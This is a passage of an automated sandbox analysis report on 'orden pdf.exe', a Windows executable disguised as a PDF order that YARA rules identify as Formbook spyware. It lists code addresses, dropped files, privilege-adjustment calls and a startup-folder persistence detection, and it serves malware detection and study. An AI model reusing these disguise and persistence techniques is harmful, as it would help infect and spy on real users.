          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001902A4
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A038E
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A467F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001906D9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001DAACE
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A4BEF
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0019CCC1
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00176F07
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0017AF50
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0019B043
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018B11F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0019D1B9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001D31BC
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0019123A
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A724D
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B13CA
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001793F0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018F563
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001796C0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BB6CC
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001777B0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001DF7FF
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A79C9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018FA57
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00179B60
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00177D19
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018FE6F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00199ED0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001A410F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001902A4
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001A038E
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0017E3B0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001A467F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001906D9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001DAACE
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001A4BEF
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0019CCC1
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00176F07
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0017AF50
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0019B043
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018B11F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0019D1B9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001D31BC
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00183200
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0019123A
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001A724D
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B13CA
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001793F0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018F563
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001796C0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BB6CC
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001777B0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001DF7FF
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001A79C9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018FA57
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00183B70
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00179B60
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00177D19
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018FE6F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00199ED0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00177FA3
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041D80C
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00401027
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041D141
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00401176
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C9D9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041CC95
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041DF0C
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00409F80
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01784120
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176F900
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821002
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177B090
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179EBB0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01760D20
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01831D55
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01786E30
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_01383200
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_013A410F
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_0138F563
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_0139B043
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_01376F07
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_01379B60
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_013777B0
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_013A4BEF
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_01399ED0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 00197E58 appears 46 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0017CB37 appears 48 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0019F8A0 appears 68 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0018EC2F appears 136 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0018F55E appears 41 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 00196AC0 appears 83 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 00182C20 appears 42 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 00190FA7 appears 42 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0018D17C appears 38 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0019185B appears 36 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0017CE19 appears 51 times
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: String function: 0018DCBE appears 41 times
          Source: orden pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: orden pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: orden pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: orden pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DeviceCensus.exe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DeviceCensus.exe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DeviceCensus.exe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DeviceCensus.exe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cx9l_rq2dula.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cx9l_rq2dula.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cx9l_rq2dula.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cx9l_rq2dula.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs orden pdf.exe
          Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmpBinary or memory string: FV_ORIGINALFILENAMEF vs orden pdf.exe
          Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmpBinary or memory string: FV_ORIGINALFILENAMEN vs orden pdf.exe
          Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameo\ vs orden pdf.exe
          Source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs orden pdf.exe
          Source: orden pdf.exe, 00000002.00000002.300214907.0000000001733000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs orden pdf.exe
          Source: orden pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@217/11@9/3
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BCE7A GetLastError,FormatMessageW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AAB84 AdjustTokenPrivileges,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001AAB84 AdjustTokenPrivileges,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001CC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0017406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\FxpxJump to behavior
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\assignedaccessprovidereventsJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FxpxJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
          Source: orden pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\orden pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
